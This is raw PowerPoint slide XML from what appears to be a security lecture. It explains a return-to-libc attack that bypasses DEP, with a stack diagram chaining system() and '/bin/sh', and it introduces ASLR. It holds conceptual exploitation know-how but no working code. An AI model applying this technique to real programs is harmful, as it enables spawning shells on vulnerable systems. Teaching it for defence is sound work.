                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>different mechanism</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16889518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Bypass DEP:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Return-to-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1371600"/>
            <a:ext cx="5562600" cy="4754563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Overwrite return address with address of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>setup fake return address and argument(s)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> will “call” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> function</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>No injected code!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Table 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3830108943"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6525590" y="2107360"/>
          <a:ext cx="1461558" cy="3715806"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5940675A-B579-460E-94D1-54222C63F5DA}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1461558"/>
              </a:tblGrid>
              <a:tr h="367246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Cambria"/>
                          <a:cs typeface="Cambria"/>
                        </a:rPr>
                        <a:t>fake</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Cambria"/>
                          <a:cs typeface="Cambria"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Cambria"/>
                          <a:cs typeface="Cambria"/>
                        </a:rPr>
                        <a:t>arg</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Cambria"/>
                          <a:cs typeface="Cambria"/>
                        </a:rPr>
                        <a:t> 1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Cambria"/>
                        <a:cs typeface="Cambria"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent4"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="367246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Cambria"/>
                          <a:cs typeface="Cambria"/>
                        </a:rPr>
                        <a:t>fake ret </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Cambria"/>
                          <a:cs typeface="Cambria"/>
                        </a:rPr>
                        <a:t>addr</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Cambria"/>
                        <a:cs typeface="Cambria"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent4"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="367246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>&amp;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>system()</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Consolas"/>
                        <a:cs typeface="Consolas"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="367246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" strike="sngStrike" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>caller’s </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" strike="sngStrike" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ebp</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" strike="sngStrike" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="2246822">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" strike="sngStrike" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>buf</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" strike="sngStrike" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1800" strike="sngStrike" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" strike="sngStrike" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>(64</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" strike="sngStrike" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> bytes)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" strike="sngStrike" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="b">
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7298164" y="1276290"/>
            <a:ext cx="1236236" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>“/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Curved Connector 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="7877446" y="1665201"/>
            <a:ext cx="718066" cy="471052"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val 611"/>
              <a:gd name="adj2" fmla="val 14853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 name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="337236333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747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="838200" y="277318"/>
            <a:ext cx="7696200" cy="6110098"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="6428925"/>
            <a:ext cx="2326403" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Image by Dino </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Dai </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Zovi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19383929">
            <a:off x="4539084" y="5291359"/>
            <a:ext cx="6064651" cy="6477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800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Advanced, not covered.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="274773783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3034508"/>
            <a:ext cx="7924800" cy="1308892"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Address Space Layout Randomization</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(ASLR)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Placeholder 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4226328" y="4267200"/>
            <a:ext cx="3739343" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>ASLR Smack and Laugh Reference</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Tilo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Muller</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="57489826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2676525" y="1012825"/>
            <a:ext cx="500063" cy="3886200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 499932"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 3885381"/>
              <a:gd name="connsiteX1" fmla="*/ 498970 w 499932"/>
              <a:gd name="connsiteY1" fmla="*/ 2101432 h 3885381"/>
              <a:gd name="connsiteX2" fmla="*/ 136082 w 499932"/>
              <a:gd name="connsiteY2" fmla="*/ 3885381 h 3885381"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="499932" h="3885381">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="238145" y="726934"/>
                  <a:pt x="476290" y="1453869"/>
                  <a:pt x="498970" y="2101432"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="521650" y="2748995"/>
                  <a:pt x="136082" y="3885381"/>
                  <a:pt x="136082" y="3885381"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38100" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="8E2800"/>
            </a:solidFill>
            <a:prstDash val="lgDash"/>
            <a:headEnd type="none"/>
            <a:tailEnd type="arrow"/>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p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2933700" y="608013"/>
            <a:ext cx="6191538" cy="5934075"/>
            <a:chOff x="2933337" y="608732"/>
            <a:chExt cx="6192670" cy="5933431"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="16400" name="Group 8"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2933337" y="2529295"/>
              <a:ext cx="3501078" cy="2368397"/>
              <a:chOff x="2933337" y="2529295"/>
              <a:chExt cx="3501078" cy="2368397"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="16411" name="Group 4"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="3625404" y="2529295"/>
                <a:ext cx="2114493" cy="2314135"/>
                <a:chOff x="4029229" y="2533274"/>
                <a:chExt cx="2114493" cy="2314135"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="16413" name="Picture 1744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29229" y="2533274"/>
                  <a:ext cx="2114493" cy="2114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14" name="TextBox 70"/>
                <p:cNvSpPr txBox="1">
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm rot="766275">
                  <a:off x="4189287" y="4447342"/>
                  <a:ext cx="1435910" cy="40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dirty="0">
                      <a:solidFill>
                        <a:srgbClr val="990000"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri"/>
                    </a:rPr>
                    <a:t>Randomize</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="1800" dirty="0">
                      <a:solidFill>
                        <a:srgbClr val="990000"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri"/>
                    </a:rPr>
                    <a:t>!</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Right Arrow 6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2933337" y="2675433"/>
                <a:ext cx="3501078" cy="2222259"/>
              </a:xfrm>
              <a:prstGeom prst="rightArrow">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 50000"/>
                  <a:gd name="adj2" fmla="val 35712"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="B64926">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16401" name="Group 9"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="6434415" y="608732"/>
              <a:ext cx="2691592" cy="5933431"/>
              <a:chOff x="6434415" y="608732"/>
              <a:chExt cx="2691592" cy="5933431"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="43" name="TextBox 42"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6434415" y="608732"/>
                <a:ext cx="1600493" cy="792076"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="6350" cmpd="sng">
                <a:prstDash val="lgDash"/>
              </a:ln>
            </p:spPr>
            <p:style>
              <a:lnRef idx="2">
                <a:schemeClr val="dk1"/>
              </a:lnRef>
              <a:fillRef idx="1">
                <a:schemeClr val="lt1"/>
              </a:fillRef>
              <a:effectRef idx="0">
                <a:schemeClr val="dk1"/>
              </a:effectRef>
              <a:fontRef idx="minor">
                <a:schemeClr val="dk1"/>
              </a:fontRef>
            </p:style>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr">
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
                  <a:t>addr</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2000" dirty="0"/>
                  <a:t> of </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
                  <a:t>buf</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
              </a:p>
              <a:p>
                <a:pPr algn="ctr">
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="2000" dirty="0"/>
                  <a:t>(0xffffd5d8)</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="44" name="Rectangle 43"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6434415" y="608732"/>
                <a:ext cx="1600493" cy="5320723"/>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5" name="TextBox 44"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6434415" y="1400808"/>
                <a:ext cx="1600493" cy="353975"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="6350" cmpd="sng">
                <a:prstDash val="lgDash"/>
              </a:ln>
            </p:spPr>
            <p:style>
              <a:lnRef idx="2">
                <a:schemeClr val="dk1"/>
              </a:lnRef>
              <a:fillRef idx="1">
                <a:schemeClr val="lt1"/>
              </a:fillRef>
              <a:effectRef idx="0">
                <a:schemeClr val="dk1"/>
              </a:effectRef>
              <a:fontRef idx="minor">
                <a:schemeClr val="dk1"/>
              </a:fontRef>
            </p:style>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr">
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
                  <a:t>caller’s </a:t>
                </a:r>
